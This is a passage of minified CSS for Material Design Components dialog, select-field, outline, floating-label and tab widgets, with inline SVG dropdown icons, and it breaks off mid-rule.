.mdc-dialog__title{text-align:right}.mdc-dialog--scrollable .mdc-dialog__title{padding-bottom:15px}.mdc-dialog__content{font-family:"Google Sans Text","Helvetica Neue",Helvetica,Arial,sans-serif;-moz-osx-font-smoothing:grayscale;-webkit-font-smoothing:antialiased;font-size:1rem;line-height:1.5rem;font-weight:400;letter-spacing:.03125em;text-decoration:inherit;text-transform:inherit;flex-grow:1;box-sizing:border-box;margin:0;padding:20px 24px;overflow:auto;-webkit-overflow-scrolling:touch}.mdc-dialog__content>:first-child{margin-top:0}.mdc-dialog__content>:last-child{margin-bottom:0}.mdc-dialog__title+.mdc-dialog__content{padding-top:0}.mdc-dialog--scrollable .mdc-dialog__content{padding-top:8px;padding-bottom:8px}.mdc-dialog__content .mdc-list:first-child:last-child{padding:6px 0 0}.mdc-dialog--scrollable .mdc-dialog__content .mdc-list:first-child:last-child{padding:0}.mdc-dialog__actions{display:flex;position:relative;flex-shrink:0;flex-wrap:wrap;align-items:center;justify-content:flex-end;box-sizing:border-box;min-height:52px;margin:0;padding:8px;border-top:1px solid transparent}.mdc-dialog--stacked .mdc-dialog__actions{flex-direction:column;align-items:flex-end}.mdc-dialog__button{margin-left:8px;margin-right:0;max-width:100%;text-align:right}[dir=rtl] .mdc-dialog__button,.mdc-dialog__button[dir=rtl]{margin-left:0;margin-right:8px}.mdc-dialog__button:first-child{margin-left:0;margin-right:0}[dir=rtl] .mdc-dialog__button:first-child,.mdc-dialog__button:first-child[dir=rtl]{margin-left:0;margin-right:0}.mdc-dialog[dir=rtl] .mdc-dialog__button,[dir=rtl] .mdc-dialog .mdc-dialog__button{text-align:left}.mdc-dialog--stacked .mdc-dialog__button:not(:first-child){margin-top:12px}.mdc-dialog--open,.mdc-dialog--opening,.mdc-dialog--closing{display:flex}.mdc-dialog--opening .mdc-dialog__scrim{transition:opacity 150ms linear}.mdc-dialog--opening .mdc-dialog__container{transition:opacity 75ms linear,transform 150ms 0ms cubic-bezier(0, 0, 0.2, 1)}.mdc-dialog--closing .mdc-dialog__scrim,.mdc-dialog--closing .mdc-dialog__container{transition:opacity 75ms linear}.mdc-dialog--closing .mdc-dialog__container{transform:scale(1)}.mdc-dialog--open .mdc-dialog__scrim{opacity:1}.mdc-dialog--open .mdc-dialog__container{transform:scale(1);opacity:1}.mdc-dialog-scroll-lock{overflow:hidden}@keyframes mdc-select-float-native-control{0%{transform:translateY(8px);opacity:0}100%{transform:translateY(0);opacity:1}}.mdc-line-ripple{position:absolute;bottom:0;left:0;width:100%;height:2px;transform:scaleX(0);transition:transform 180ms cubic-bezier(0.4, 0, 0.2, 1),opacity 180ms cubic-bezier(0.4, 0, 0.2, 1);opacity:0;z-index:2}.mdc-line-ripple--active{transform:scaleX(1);opacity:1}.mdc-line-ripple--deactivating{opacity:0}.mdc-notched-outline{display:flex;position:absolute;right:0;left:0;box-sizing:border-box;width:100%;max-width:100%;height:100%;text-align:left;pointer-events:none}[dir=rtl] .mdc-notched-outline,.mdc-notched-outline[dir=rtl]{text-align:right}.mdc-notched-outline__leading,.mdc-notched-outline__notch,.mdc-notched-outline__trailing{box-sizing:border-box;height:100%;transition:border 150ms cubic-bezier(0.4, 0, 0.2, 1);border-top:1px solid;border-bottom:1px solid;pointer-events:none}.mdc-notched-outline__leading{border-left:1px solid;border-right:none;width:12px}[dir=rtl] .mdc-notched-outline__leading,.mdc-notched-outline__leading[dir=rtl]{border-left:none;border-right:1px solid}.mdc-notched-outline__trailing{border-left:none;border-right:1px solid;flex-grow:1}[dir=rtl] .mdc-notched-outline__trailing,.mdc-notched-outline__trailing[dir=rtl]{border-left:1px solid;border-right:none}.mdc-notched-outline__notch{flex:0 0 auto;width:auto;max-width:calc(100% - 12px * 2)}.mdc-notched-outline .mdc-floating-label{display:inline-block;position:relative;top:17px;bottom:auto;max-width:100%}.mdc-notched-outline .mdc-floating-label--float-above{text-overflow:clip}.mdc-notched-outline--upgraded .mdc-floating-label--float-above{max-width:calc(100% / .75)}.mdc-notched-outline--notched .mdc-notched-outline__notch{padding-left:0;padding-right:8px;border-top:none}[dir=rtl] .mdc-notched-outline--notched .mdc-notched-outline__notch,.mdc-notched-outline--notched .mdc-notched-outline__notch[dir=rtl]{padding-left:8px;padding-right:0}.mdc-notched-outline--no-label .mdc-notched-outline__notch{padding:0}.mdc-floating-label{font-family:"Google Sans Text","Helvetica Neue",Helvetica,Arial,sans-serif;-moz-osx-font-smoothing:grayscale;-webkit-font-smoothing:antialiased;font-size:14px;line-height:1.75rem;font-weight:400;letter-spacing:.009375em;text-decoration:inherit;text-transform:inherit;position:absolute;left:0;transform-origin:left top;transition:transform 150ms cubic-bezier(0.4, 0, 0.2, 1),color 150ms cubic-bezier(0.4, 0, 0.2, 1);line-height:1.15rem;text-align:left;text-overflow:ellipsis;white-space:nowrap;cursor:text;overflow:hidden;will-change:transform}[dir=rtl] .mdc-floating-label,.mdc-floating-label[dir=rtl]{right:0;left:auto;transform-origin:right top;text-align:right}.mdc-floating-label--float-above{cursor:auto}.mdc-floating-label--float-above{transform:translateY(-50%) scale(0.75)}.mdc-floating-label--shake{animation:mdc-floating-label-shake-float-above-standard 250ms 1}@keyframes mdc-floating-label-shake-float-above-standard{0%{transform:translateX(calc(0 - 0%)) translateY(-50%) scale(0.75)}33%{animation-timing-function:cubic-bezier(0.5, 0, 0.701732, 0.495819);transform:translateX(calc(4% - 0%)) translateY(-50%) scale(0.75)}66%{animation-timing-function:cubic-bezier(0.302435, 0.381352, 0.55, 0.956352);transform:translateX(calc(-4% - 0%)) translateY(-50%) scale(0.75)}100%{transform:translateX(calc(0 - 0%)) translateY(-50%) scale(0.75)}}.mdc-select--with-leading-icon:not(.mdc-select--disabled) .mdc-select__icon{color:#000;color:var(--mdc-theme-on-surface, #000)}.mdc-select--with-leading-icon .mdc-select__icon{display:inline-block;position:absolute;bottom:16px;box-sizing:border-box;width:24px;height:24px;border:none;background-color:transparent;fill:currentColor;opacity:.54;-webkit-text-decoration:none;text-decoration:none;cursor:pointer;-webkit-user-select:none;user-select:none}.mdc-select__icon:not([tabindex]),.mdc-select__icon[tabindex="-1"]{cursor:default;pointer-events:none}.mdc-select-helper-text{font-family:"Google Sans Text","Helvetica Neue",Helvetica,Arial,sans-serif;-moz-osx-font-smoothing:grayscale;-webkit-font-smoothing:antialiased;font-size:.75rem;line-height:1.25rem;font-weight:400;letter-spacing:.0333333333em;text-decoration:inherit;text-transform:inherit;display:block;margin-top:0;line-height:normal;margin:0;transition:opacity 180ms cubic-bezier(0.4, 0, 0.2, 1);opacity:0;will-change:opacity}.mdc-select-helper-text::before{display:inline-block;width:0;height:16px;content:"";vertical-align:0}.mdc-select-helper-text--persistent{transition:none;opacity:1;will-change:initial}.mdc-select{--mdc-ripple-fg-size: 0;--mdc-ripple-left: 0;--mdc-ripple-top: 0;--mdc-ripple-fg-scale: 1;--mdc-ripple-fg-translate-end: 0;--mdc-ripple-fg-translate-start: 0;-webkit-tap-highlight-color:rgba(0,0,0,0);display:inline-flex;position:relative;box-sizing:border-box;height:56px;overflow:hidden;will-change:opacity,transform,color}.mdc-select:not(.mdc-select--disabled){background-color:#f5f5f5}.mdc-select::before,.mdc-select::after{position:absolute;border-radius:50%;opacity:0;pointer-events:none;content:""}.mdc-select::before{transition:opacity 15ms linear,background-color 15ms linear;z-index:1}.mdc-select.mdc-ripple-upgraded::before{transform:scale(var(--mdc-ripple-fg-scale, 1))}.mdc-select.mdc-ripple-upgraded::after{top:0;left:0;transform:scale(0);transform-origin:center center}.mdc-select.mdc-ripple-upgraded--unbounded::after{top:var(--mdc-ripple-top, 0);left:var(--mdc-ripple-left, 0)}.mdc-select.mdc-ripple-upgraded--foreground-activation::after{animation:mdc-ripple-fg-radius-in 225ms forwards,mdc-ripple-fg-opacity-in 75ms forwards}.mdc-select.mdc-ripple-upgraded--foreground-deactivation::after{animation:mdc-ripple-fg-opacity-out 150ms;transform:translate(var(--mdc-ripple-fg-translate-end, 0)) scale(var(--mdc-ripple-fg-scale, 1))}.mdc-select::before,.mdc-select::after{top:calc(50% - 100%);left:calc(50% - 100%);width:200%;height:200%}.mdc-select.mdc-ripple-upgraded::after{width:var(--mdc-ripple-fg-size, 100%);height:var(--mdc-ripple-fg-size, 100%)}.mdc-select::before,.mdc-select::after{background-color:rgba(0,0,0,.87)}.mdc-select:hover::before{opacity:.04}.mdc-select:not(.mdc-ripple-upgraded):focus::before,.mdc-select.mdc-ripple-upgraded--background-focused::before{transition-duration:75ms;opacity:.12}.mdc-select:not(.mdc-select--disabled) .mdc-select__native-control,.mdc-select:not(.mdc-select--disabled) .mdc-select__selected-text{color:rgba(0,0,0,.87)}.mdc-select:not(.mdc-select--disabled) .mdc-floating-label{color:rgba(0,0,0,.6)}.mdc-select:not(.mdc-select--disabled) .mdc-select__native-control,.mdc-select:not(.mdc-select--disabled) .mdc-select__selected-text{border-bottom-color:rgba(0,0,0,.42)}.mdc-select:not(.mdc-select--disabled)+.mdc-select-helper-text{color:rgba(0,0,0,.6)}.mdc-select,.mdc-select__native-control{border-radius:4px 4px 0 0}.mdc-select:not(.mdc-select--disabled).mdc-select--focused .mdc-line-ripple{background-color:#3c7251;background-color:var(--mdc-theme-primary, #3c7251)}.mdc-select:not(.mdc-select--disabled).mdc-select--focused .mdc-floating-label{color:rgba(60,114,81,.87)}.mdc-select:not(.mdc-select--disabled) .mdc-select__native-control:hover{border-bottom-color:rgba(0,0,0,.87)}.mdc-select .mdc-floating-label--float-above{transform:translateY(-70%) scale(0.75)}.mdc-select .mdc-floating-label{left:16px;right:initial;top:21px;pointer-events:none}[dir=rtl] .mdc-select .mdc-floating-label,.mdc-select .mdc-floating-label[dir=rtl]{left:initial;right:16px}.mdc-select.mdc-select--with-leading-icon .mdc-floating-label{left:48px;right:initial}[dir=rtl] .mdc-select.mdc-select--with-leading-icon .mdc-floating-label,.mdc-select.mdc-select--with-leading-icon .mdc-floating-label[dir=rtl]{left:initial;right:48px}.mdc-select.mdc-select--outlined .mdc-floating-label{left:4px;right:initial;top:17px}[dir=rtl] .mdc-select.mdc-select--outlined .mdc-floating-label,.mdc-select.mdc-select--outlined .mdc-floating-label[dir=rtl]{left:initial;right:4px}.mdc-select.mdc-select--outlined.mdc-select--with-leading-icon .mdc-floating-label{left:36px;right:initial}[dir=rtl] .mdc-select.mdc-select--outlined.mdc-select--with-leading-icon .mdc-floating-label,.mdc-select.mdc-select--outlined.mdc-select--with-leading-icon .mdc-floating-label[dir=rtl]{left:initial;right:36px}.mdc-select.mdc-select--outlined.mdc-select--with-leading-icon .mdc-floating-label--float-above{left:36px;right:initial}[dir=rtl] .mdc-select.mdc-select--outlined.mdc-select--with-leading-icon .mdc-floating-label--float-above,.mdc-select.mdc-select--outlined.mdc-select--with-leading-icon .mdc-floating-label--float-above[dir=rtl]{left:initial;right:36px}.mdc-select__dropdown-icon{background:url("data:image/svg+xml,%3Csvg%20width%3D%2210px%22%20height%3D%225px%22%20viewBox%3D%227%2010%2010%205%22%20version%3D%221.1%22%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%20xmlns%3Axlink%3D%22http%3A%2F%2Fwww.w3.org%2F1999%2Fxlink%22%3E%0A%20%20%20%20%3Cpolygon%20id%3D%22Shape%22%20stroke%3D%22none%22%20fill%3D%22%23000%22%20fill-rule%3D%22evenodd%22%20opacity%3D%220.54%22%20points%3D%227%2010%2012%2015%2017%2010%22%3E%3C%2Fpolygon%3E%0A%3C%2Fsvg%3E") no-repeat center;left:auto;right:8px;position:absolute;bottom:16px;width:24px;height:24px;transition:transform 150ms cubic-bezier(0.4, 0, 0.2, 1);pointer-events:none}[dir=rtl] .mdc-select__dropdown-icon,.mdc-select__dropdown-icon[dir=rtl]{left:8px;right:auto}.mdc-select--focused .mdc-select__dropdown-icon{background:url("data:image/svg+xml,%3Csvg%20width%3D%2210px%22%20height%3D%225px%22%20viewBox%3D%227%2010%2010%205%22%20version%3D%221.1%22%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%20xmlns%3Axlink%3D%22http%3A%2F%2Fwww.w3.org%2F1999%2Fxlink%22%3E%0A%20%20%20%20%3Cpolygon%20id%3D%22Shape%22%20stroke%3D%22none%22%20fill%3D%22%233c7251%22%20fill-rule%3D%22evenodd%22%20opacity%3D%221%22%20points%3D%227%2010%2012%2015%2017%2010%22%3E%3C%2Fpolygon%3E%0A%3C%2Fsvg%3E") no-repeat center;transform:rotate(180deg) translateY(-5px);transition:transform 150ms cubic-bezier(0.4, 0, 0.2, 1)}.mdc-select__native-control{padding-top:20px}.mdc-select.mdc-select--focused .mdc-line-ripple::after{transform:scale(1, 2);opacity:1}.mdc-select+.mdc-select-helper-text{margin-right:12px;margin-left:12px}.mdc-select--outlined+.mdc-select-helper-text{margin-right:16px;margin-left:16px}.mdc-select--focused+.mdc-select-helper-text:not(.mdc-select-helper-text--validation-msg){opacity:1}.mdc-select__selected-text{min-width:200px;padding-top:22px}.mdc-select__native-control,.mdc-select__selected-text{padding-left:16px;padding-right:52px;font-family:"Google Sans Text","Helvetica Neue",Helvetica,Arial,sans-serif;-moz-osx-font-smoothing:grayscale;-webkit-font-smoothing:antialiased;font-size:14px;line-height:1.75rem;font-weight:400;letter-spacing:.009375em;text-decoration:inherit;text-transform:inherit;box-sizing:border-box;width:100%;height:56px;padding-top:20px;padding-bottom:4px;border:none;border-bottom:1px solid;outline:none;background-color:transparent;color:inherit;white-space:nowrap;cursor:pointer;appearance:none}[dir=rtl] .mdc-select__native-control,.mdc-select__native-control[dir=rtl],[dir=rtl] .mdc-select__selected-text,.mdc-select__selected-text[dir=rtl]{padding-left:52px;padding-right:16px}.mdc-select__native-control::-ms-expand,.mdc-select__selected-text::-ms-expand{display:none}.mdc-select__native-control::-ms-value,.mdc-select__selected-text::-ms-value{background-color:transparent;color:inherit}@-moz-document url-prefix(""){.mdc-select__native-control,.mdc-select__selected-text{text-indent:-2px}}.mdc-select--outlined{border:none;overflow:visible}.mdc-select--outlined:not(.mdc-select--disabled){background-color:transparent}.mdc-select--outlined:not(.mdc-select--disabled) .mdc-notched-outline__leading,.mdc-select--outlined:not(.mdc-select--disabled) .mdc-notched-outline__notch,.mdc-select--outlined:not(.mdc-select--disabled) .mdc-notched-outline__trailing{border-color:rgba(0,0,0,.24)}.mdc-select--outlined:not(.mdc-select--disabled):not(.mdc-select--focused) .mdc-select__native-control:hover~.mdc-notched-outline .mdc-notched-outline__leading,.mdc-select--outlined:not(.mdc-select--disabled):not(.mdc-select--focused) .mdc-select__native-control:hover~.mdc-notched-outline .mdc-notched-outline__notch,.mdc-select--outlined:not(.mdc-select--disabled):not(.mdc-select--focused) .mdc-select__native-control:hover~.mdc-notched-outline .mdc-notched-outline__trailing,.mdc-select--outlined:not(.mdc-select--disabled):not(.mdc-select--focused) .mdc-select__selected-text:hover~.mdc-notched-outline .mdc-notched-outline__leading,.mdc-select--outlined:not(.mdc-select--disabled):not(.mdc-select--focused) .mdc-select__selected-text:hover~.mdc-notched-outline .mdc-notched-outline__notch,.mdc-select--outlined:not(.mdc-select--disabled):not(.mdc-select--focused) .mdc-select__selected-text:hover~.mdc-notched-outline .mdc-notched-outline__trailing{border-color:rgba(0,0,0,.87)}.mdc-select--outlined:not(.mdc-select--disabled).mdc-select--focused .mdc-notched-outline .mdc-notched-outline__leading,.mdc-select--outlined:not(.mdc-select--disabled).mdc-select--focused .mdc-notched-outline .mdc-notched-outline__notch,.mdc-select--outlined:not(.mdc-select--disabled).mdc-select--focused .mdc-notched-outline .mdc-notched-outline__trailing{border-width:2px}.mdc-select--outlined:not(.mdc-select--disabled).mdc-select--focused .mdc-notched-outline .mdc-notched-outline__leading,.mdc-select--outlined:not(.mdc-select--disabled).mdc-select--focused .mdc-notched-outline .mdc-notched-outline__notch,.mdc-select--outlined:not(.mdc-select--disabled).mdc-select--focused .mdc-notched-outline .mdc-notched-outline__trailing{border-color:#3c7251;border-color:var(--mdc-theme-primary, #3c7251)}.mdc-select--outlined .mdc-floating-label--shake{animation:mdc-floating-label-shake-float-above-text-field-outlined 250ms 1}.mdc-select--outlined .mdc-notched-outline .mdc-notched-outline__leading{border-radius:4px 0 0 4px}[dir=rtl] .mdc-select--outlined .mdc-notched-outline .mdc-notched-outline__leading,.mdc-select--outlined .mdc-notched-outline .mdc-notched-outline__leading[dir=rtl]{border-radius:0 4px 4px 0}.mdc-select--outlined .mdc-notched-outline .mdc-notched-outline__trailing{border-radius:0 4px 4px 0}[dir=rtl] .mdc-select--outlined .mdc-notched-outline .mdc-notched-outline__trailing,.mdc-select--outlined .mdc-notched-outline .mdc-notched-outline__trailing[dir=rtl]{border-radius:4px 0 0 4px}.mdc-select--outlined .mdc-select__native-control{border-radius:4px}.mdc-select--outlined::before,.mdc-select--outlined::after{content:none}.mdc-select--outlined:not(.mdc-select--disabled){background-color:transparent}.mdc-select--outlined .mdc-floating-label--float-above{transform:translateY(-144%) scale(1)}.mdc-select--outlined .mdc-floating-label--float-above{font-size:.75rem}.mdc-select--outlined.mdc-notched-outline--upgraded .mdc-floating-label--float-above,.mdc-select--outlined .mdc-notched-outline--upgraded .mdc-floating-label--float-above{transform:translateY(-130%) scale(0.75)}.mdc-select--outlined.mdc-notched-outline--upgraded .mdc-floating-label--float-above,.mdc-select--outlined .mdc-notched-outline--upgraded .mdc-floating-label--float-above{font-size:1rem}.mdc-select--outlined .mdc-select__native-control,.mdc-select--outlined .mdc-select__selected-text{padding-left:16px;padding-right:52px;display:flex;padding-top:12px;padding-bottom:12px;border:none;background-color:transparent;z-index:1}[dir=rtl] .mdc-select--outlined .mdc-select__native-control,.mdc-select--outlined .mdc-select__native-control[dir=rtl],[dir=rtl] .mdc-select--outlined .mdc-select__selected-text,.mdc-select--outlined .mdc-select__selected-text[dir=rtl]{padding-left:52px;padding-right:16px}.mdc-select--outlined .mdc-select__selected-text{padding-top:14px}.mdc-select--outlined .mdc-select__icon{z-index:2}.mdc-select--outlined .mdc-floating-label{line-height:1.15rem;pointer-events:auto}.mdc-select--invalid:not(.mdc-select--disabled) .mdc-floating-label{color:#b00020;color:var(--mdc-theme-error, #b00020)}.mdc-select--invalid:not(.mdc-select--disabled) .mdc-select__native-control,.mdc-select--invalid:not(.mdc-select--disabled) .mdc-select__selected-text{border-bottom-color:#b00020;border-bottom-color:var(--mdc-theme-error, #b00020)}.mdc-select--invalid:not(.mdc-select--disabled).mdc-select--focused .mdc-line-ripple{background-color:#b00020;background-color:var(--mdc-theme-error, #b00020)}.mdc-select--invalid:not(.mdc-select--disabled).mdc-select--focused .mdc-floating-label{color:#b00020}.mdc-select--invalid:not(.mdc-select--disabled).mdc-select--invalid+.mdc-select-helper-text--validation-msg{color:#b00020;color:var(--mdc-theme-error, #b00020)}.mdc-select--invalid:not(.mdc-select--disabled) .mdc-select__native-control:hover{border-bottom-color:#b00020;border-bottom-color:var(--mdc-theme-error, #b00020)}.mdc-select--invalid.mdc-select--outlined:not(.mdc-select--disabled) .mdc-notched-outline__leading,.mdc-select--invalid.mdc-select--outlined:not(.mdc-select--disabled) .mdc-notched-outline__notch,.mdc-select--invalid.mdc-select--outlined:not(.mdc-select--disabled) .mdc-notched-outline__trailing{border-color:#b00020;border-color:var(--mdc-theme-error, #b00020)}.mdc-select--invalid.mdc-select--outlined:not(.mdc-select--disabled):not(.mdc-select--focused) .mdc-select__native-control:hover~.mdc-notched-outline .mdc-notched-outline__leading,.mdc-select--invalid.mdc-select--outlined:not(.mdc-select--disabled):not(.mdc-select--focused) .mdc-select__native-control:hover~.mdc-notched-outline .mdc-notched-outline__notch,.mdc-select--invalid.mdc-select--outlined:not(.mdc-select--disabled):not(.mdc-select--focused) .mdc-select__native-control:hover~.mdc-notched-outline .mdc-notched-outline__trailing,.mdc-select--invalid.mdc-select--outlined:not(.mdc-select--disabled):not(.mdc-select--focused) .mdc-select__selected-text:hover~.mdc-notched-outline .mdc-notched-outline__leading,.mdc-select--invalid.mdc-select--outlined:not(.mdc-select--disabled):not(.mdc-select--focused) .mdc-select__selected-text:hover~.mdc-notched-outline .mdc-notched-outline__notch,.mdc-select--invalid.mdc-select--outlined:not(.mdc-select--disabled):not(.mdc-select--focused) .mdc-select__selected-text:hover~.mdc-notched-outline .mdc-notched-outline__trailing{border-color:#b00020;border-color:var(--mdc-theme-error, #b00020)}.mdc-select--invalid.mdc-select--outlined:not(.mdc-select--disabled).mdc-select--focused .mdc-notched-outline .mdc-notched-outline__leading,.mdc-select--invalid.mdc-select--outlined:not(.mdc-select--disabled).mdc-select--focused .mdc-notched-outline .mdc-notched-outline__notch,.mdc-select--invalid.mdc-select--outlined:not(.mdc-select--disabled).mdc-select--focused .mdc-notched-outline .mdc-notched-outline__trailing{border-width:2px}.mdc-select--invalid.mdc-select--outlined:not(.mdc-select--disabled).mdc-select--focused .mdc-notched-outline .mdc-notched-outline__leading,.mdc-select--invalid.mdc-select--outlined:not(.mdc-select--disabled).mdc-select--focused .mdc-notched-outline .mdc-notched-outline__notch,.mdc-select--invalid.mdc-select--outlined:not(.mdc-select--disabled).mdc-select--focused .mdc-notched-outline .mdc-notched-outline__trailing{border-color:#b00020;border-color:var(--mdc-theme-error, #b00020)}.mdc-select--invalid .mdc-select__dropdown-icon{background:url("data:image/svg+xml,%3Csvg%20width%3D%2210px%22%20height%3D%225px%22%20viewBox%3D%227%2010%2010%205%22%20version%3D%221.1%22%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%20xmlns%3Axlink%3D%22http%3A%2F%2Fwww.w3.org%2F1999%2Fxlink%22%3E%0A%20%20%20%20%3Cpolygon%20id%3D%22Shape%22%20stroke%3D%22none%22%20fill%3D%22%23b00020%22%20fill-rule%3D%22evenodd%22%20opacity%3D%221%22%20points%3D%227%2010%2012%2015%2017%2010%22%3E%3C%2Fpolygon%3E%0A%3C%2Fsvg%3E") no-repeat center}.mdc-select--invalid+.mdc-select-helper-text--validation-msg{opacity:1}.mdc-select--required .mdc-floating-label::after{content:"*"}.mdc-select--disabled{background-color:#fafafa;cursor:default;pointer-events:none}.mdc-select--disabled .mdc-floating-label{color:rgba(0,0,0,.37)}.mdc-select--disabled .mdc-select__dropdown-icon{background:url("data:image/svg+xml,%3Csvg%20width%3D%2210px%22%20height%3D%225px%22%20viewBox%3D%227%2010%2010%205%22%20version%3D%221.1%22%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%20xmlns%3Axlink%3D%22http%3A%2F%2Fwww.w3.org%2F1999%2Fxlink%22%3E%0A%20%20%20%20%3Cpolygon%20id%3D%22Shape%22%20stroke%3D%22none%22%20fill%3D%22%23000%22%20fill-rule%3D%22evenodd%22%20opacity%3D%220.37%22%20points%3D%227%2010%2012%2015%2017%2010%22%3E%3C%2Fpolygon%3E%0A%3C%2Fsvg%3E") no-repeat center}.mdc-select--disabled .mdc-line-ripple{display:none}.mdc-select--disabled .mdc-select__icon{color:rgba(0,0,0,.37)}.mdc-select--disabled .mdc-select__native-control,.mdc-select--disabled .mdc-select__selected-text{color:rgba(0,0,0,.37);border-bottom-style:dotted}.mdc-select--disabled .mdc-select__selected-text{pointer-events:none}.mdc-select--disabled.mdc-select--outlined{background-color:transparent}.mdc-select--disabled.mdc-select--outlined .mdc-select__native-control,.mdc-select--disabled.mdc-select--outlined .mdc-select__selected-text{border-bottom-style:none}.mdc-select--disabled.mdc-select--outlined .mdc-notched-outline__leading,.mdc-select--disabled.mdc-select--outlined .mdc-notched-outline__notch,.mdc-select--disabled.mdc-select--outlined .mdc-notched-outline__trailing{border-color:rgba(0,0,0,.16)}.mdc-select--with-leading-icon .mdc-select__icon{left:16px;right:initial}[dir=rtl] .mdc-select--with-leading-icon .mdc-select__icon,.mdc-select--with-leading-icon .mdc-select__icon[dir=rtl]{left:initial;right:16px}.mdc-select--with-leading-icon .mdc-select__native-control,.mdc-select--with-leading-icon .mdc-select__selected-text{padding-left:48px;padding-right:32px}[dir=rtl] .mdc-select--with-leading-icon .mdc-select__native-control,.mdc-select--with-leading-icon .mdc-select__native-control[dir=rtl],[dir=rtl] .mdc-select--with-leading-icon .mdc-select__selected-text,.mdc-select--with-leading-icon .mdc-select__selected-text[dir=rtl]{padding-left:32px;padding-right:48px}.mdc-select--with-leading-icon.mdc-select--outlined .mdc-floating-label--float-above{transform:translateY(-144%) translateX(-32px) scale(1)}[dir=rtl] .mdc-select--with-leading-icon.mdc-select--outlined .mdc-floating-label--float-above,.mdc-select--with-leading-icon.mdc-select--outlined .mdc-floating-label--float-above[dir=rtl]{transform:translateY(-144%) translateX(32px) scale(1)}.mdc-select--with-leading-icon.mdc-select--outlined .mdc-floating-label--float-above{font-size:.75rem}.mdc-select--with-leading-icon.mdc-select--outlined.mdc-notched-outline--upgraded .mdc-floating-label--float-above,.mdc-select--with-leading-icon.mdc-select--outlined .mdc-notched-outline--upgraded .mdc-floating-label--float-above{transform:translateY(-130%) translateX(-32px) scale(0.75)}[dir=rtl] .mdc-select--with-leading-icon.mdc-select--outlined.mdc-notched-outline--upgraded .mdc-floating-label--float-above,.mdc-select--with-leading-icon.mdc-select--outlined.mdc-notched-outline--upgraded .mdc-floating-label--float-above[dir=rtl],[dir=rtl] .mdc-select--with-leading-icon.mdc-select--outlined .mdc-notched-outline--upgraded .mdc-floating-label--float-above,.mdc-select--with-leading-icon.mdc-select--outlined .mdc-notched-outline--upgraded .mdc-floating-label--float-above[dir=rtl]{transform:translateY(-130%) translateX(32px) scale(0.75)}.mdc-select--with-leading-icon.mdc-select--outlined.mdc-notched-outline--upgraded .mdc-floating-label--float-above,.mdc-select--with-leading-icon.mdc-select--outlined .mdc-notched-outline--upgraded .mdc-floating-label--float-above{font-size:1rem}.mdc-select--with-leading-icon.mdc-select--outlined .mdc-floating-label--shake{animation:mdc-floating-label-shake-float-above-select-outlined-leading-icon 250ms 1}[dir=rtl] .mdc-select--with-leading-icon.mdc-select--outlined .mdc-floating-label--shake,.mdc-select--with-leading-icon.mdc-select--outlined[dir=rtl] .mdc-floating-label--shake{animation:mdc-floating-label-shake-float-above-select-outlined-leading-icon-rtl 250ms 1}.mdc-select--with-leading-icon.mdc-select__menu .mdc-list-item__text{padding-left:32px;padding-right:32px}[dir=rtl] .mdc-select--with-leading-icon.mdc-select__menu .mdc-list-item__text,.mdc-select--with-leading-icon.mdc-select__menu .mdc-list-item__text[dir=rtl]{padding-left:32px;padding-right:32px}.mdc-select__menu .mdc-list .mdc-list-item--selected{color:#000;color:var(--mdc-theme-on-surface, #000)}.mdc-select__menu .mdc-list .mdc-list-item--selected::before,.mdc-select__menu .mdc-list .mdc-list-item--selected::after{background-color:#000}@supports not (-ms-ime-align: auto){.mdc-select__menu .mdc-list .mdc-list-item--selected::before,.mdc-select__menu .mdc-list .mdc-list-item--selected::after{background-color:var(--mdc-theme-on-surface, #000)}}.mdc-select__menu .mdc-list .mdc-list-item--selected:hover::before{opacity:.04}.mdc-select__menu .mdc-list .mdc-list-item--selected:not(.mdc-ripple-upgraded):focus::before,.mdc-select__menu .mdc-list .mdc-list-item--selected.mdc-ripple-upgraded--background-focused::before{transition-duration:75ms;opacity:.12}.mdc-select__menu .mdc-list .mdc-list-item--selected:not(.mdc-ripple-upgraded)::after{transition:opacity 150ms linear}.mdc-select__menu .mdc-list .mdc-list-item--selected:not(.mdc-ripple-upgraded):active::after{transition-duration:75ms;opacity:.12}.mdc-select__menu .mdc-list .mdc-list-item--selected.mdc-ripple-upgraded{--mdc-ripple-fg-opacity: 0.12}@keyframes mdc-floating-label-shake-float-above-select-outlined-leading-icon{0%{transform:translateX(calc(0 - 32px)) translateY(-130%) scale(0.75)}33%{animation-timing-function:cubic-bezier(0.5, 0, 0.701732, 0.495819);transform:translateX(calc(4% - 32px)) translateY(-130%) scale(0.75)}66%{animation-timing-function:cubic-bezier(0.302435, 0.381352, 0.55, 0.956352);transform:translateX(calc(-4% - 32px)) translateY(-130%) scale(0.75)}100%{transform:translateX(calc(0 - 32px)) translateY(-130%) scale(0.75)}}@keyframes mdc-floating-label-shake-float-above-select-outlined-leading-icon-rtl{0%{transform:translateX(calc(0 - -32px)) translateY(-130%) scale(0.75)}33%{animation-timing-function:cubic-bezier(0.5, 0, 0.701732, 0.495819);transform:translateX(calc(4% - -32px)) translateY(-130%) scale(0.75)}66%{animation-timing-function:cubic-bezier(0.302435, 0.381352, 0.55, 0.956352);transform:translateX(calc(-4% - -32px)) translateY(-130%) scale(0.75)}100%{transform:translateX(calc(0 - -32px)) translateY(-130%) scale(0.75)}}.mdc-tab{position:relative;font-family:"Google Sans Text","Helvetica Neue",Helvetica,Arial,sans-serif;-moz-osx-font-smoothing:grayscale;-webkit-font-smoothing:antialiased;font-size:.875rem;line-height:2.25rem;font-weight:500;letter-spacing:.0892857143em;-webkit-text-decoration:none;text-decoration:none;text-transform:uppercase;display:flex;flex:1 0 auto;justify-content:center;box-sizing:border-box;height:48px;padding:0 24px;border:none;outline:none;background:none;text-align:center;white-space:nowrap;cursor:pointer;-webkit-appearance:none;z-index:1}.mdc-tab .mdc-tab__text-label{color:#000;color:var(--mdc-theme-on-surface, #000)}.mdc-tab .mdc-tab__icon{color:#000;color:var(--mdc-theme-on-surface, #000);fill:currentColor}.mdc-tab::-moz-focus-inner{padding:0;border:0}.mdc-tab--min-width{flex:0 1 auto}.mdc-tab__ripple{--mdc-ripple-fg-size: 0;--mdc-ripple-left: 0;--mdc-ripple-top: 0;--mdc-ripple-fg-scale: 1;--mdc-ripple-fg-translate-end: 0;--mdc-ripple-fg-translate-start: 